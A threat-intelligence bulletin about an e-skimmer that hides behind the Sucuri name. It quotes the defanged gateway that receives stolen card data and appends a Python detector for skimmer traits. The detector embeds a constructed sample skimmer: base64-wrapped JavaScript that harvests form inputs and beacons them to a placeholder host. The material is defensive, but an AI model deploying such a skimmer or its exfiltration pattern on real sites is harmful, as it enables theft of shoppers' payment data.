Threat Watch

Sucuri Name Being Used by E-Skimmer to Avoid Detection

Cybersecurity company Sucuri recently revealed that they discovered an e-skimmer taking advantage of their name in order to go unnoticed. The attackers inject the base64-encoded JavaScript skimmer into targeted sites. Once the skimmer is in place on a site, it gathers personal information from form fields and sends it to a remote gateway. “The payment data exfiltration takes place via an <img> tag whose src parameter is changed to hxxps://terminal4.veeblehosting[.]com/~sucurrin/i/gate.php, with relevant GET parameters such as card number, CVV, and expiration date stored in plain text,” reads a portion of Sucuri’s analysis. The “terminal4.veeblehosting[.]com/~sucurrin/” URL path even redirects to the real Sucuri webpage in an effort to further avoid detection. It is believed that the skimmer in question was also used in an attempt to exfiltrate data on the websites for Harley-Davidson Military, Nappy Land National Childcare Supplier, and Soccer4All.

ANALYST NOTES

E-skimmers can be difficult to protect against, but companies should regularly monitor their sites as a web client would, in an effort to detect suspicious JavaScript-initiated communication between visitors' browsers and malicious or unexpected servers. Companies that operate e-commerce websites can also monitor file integrity changes and look for anomalies such as new references to JavaScript functions. As this incident shows, it is important to carefully examine the contents of JavaScript code and not just rely on the name of the script file or the hostname it contacts to indicate that it is safe or expected. A Security Operations Center (SOC) should monitor critical web servers used for e-commerce to detect any abnormal patterns of remote access or evidence of backdoor implants that could indicate an attacker has accessed the system. The Binary Defense Security Operations Task Force operates 24/7 to monitor security events on servers and workstations. Another method of protection would be to employ a trusted security provider that tests for system vulnerabilities and can give guidance on how to better secure the website. Such security assessments are provided by TrustedSec.
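The following is an added example, not code from Sucuri or the original report, showing the kind of content-based check the analyst notes call for: it decodes any base64 layer in a script, flags image-beacon exfiltration of form fields, calls to hosts outside an allowlist, and brand lookalikes that use the Sucuri name on a host other than sucuri.net. The allowlist, the `.invalid` hosts and the sample skimmer are constructed for this example.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts this shop's pages are expected to contact (constructed allowlist).
ALLOWED_HOSTS = {"www.example-shop.invalid", "cdn.example-shop.invalid"}
# The Sucuri name is legitimate only under sucuri.net; elsewhere it is a lookalike.
BRAND_RE = re.compile(r"sucur", re.IGNORECASE)
GENUINE_BRAND_HOST = "sucuri.net"

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Form-field harvesting and an <img>/Image src beacon, the two halves of this skimmer.
HARVEST_RE = re.compile(r"getElementsByTagName\(\s*['\"]input['\"]\s*\)|querySelectorAll\(\s*['\"]input|\.value\b")
BEACON_RE = re.compile(r"new\s+Image\s*\(|\.src\s*=|gate\.php")

def decode_base64_layers(js):
    """Return every long base64 run in js that decodes to readable text."""
    layers = []
    for m in B64_RE.finditer(js):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            layers.append(text)
    return layers

def scan_script(js):
    """Flag skimmer traits in js itself (layer 0) and in each base64 layer it carries."""
    findings = []
    for depth, layer in enumerate([js] + decode_base64_layers(js)):
        for url in URL_RE.findall(layer):
            host = urlparse(url).hostname or ""
            if host not in ALLOWED_HOSTS:
                findings.append(f"layer {depth}: unexpected host {host}")
            if BRAND_RE.search(url) and not host.endswith(GENUINE_BRAND_HOST):
                findings.append(f"layer {depth}: brand lookalike in {url}")
        if HARVEST_RE.search(layer) and BEACON_RE.search(layer):
            findings.append(f"layer {depth}: form harvesting plus image beacon")
    return findings

# Constructed sample: a loader that decodes and evals a skimmer which collects
# input values and sends them as GET parameters of an image request.
_PAYLOAD = ("var f=document.getElementsByTagName('input'),q='';"
            "for(var i=0;i<f.length;i++){q+=f[i].name+'='+f[i].value+'&';}"
            "new Image().src='https://static.example.invalid/~sucurrin/i/gate.php?'+q;")
SAMPLE_SKIMMER = "eval(atob('" + base64.b64encode(_PAYLOAD.encode()).decode() + "'));"
SAMPLE_CLEAN = "fetch('https://cdn.example-shop.invalid/api/cart').then(r=>r.json());"

if __name__ == "__main__":
    for line in scan_script(SAMPLE_SKIMMER):
        print(line)
```

Run it against a site's served scripts and pair the allowlist with a strict `connect-src`/`img-src` Content Security Policy so that a beacon to an unexpected host is blocked as well as reported.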

Source: https://securityaffairs.co/wordpress/111009/cyber-crime/sucuri-software-skimmer.html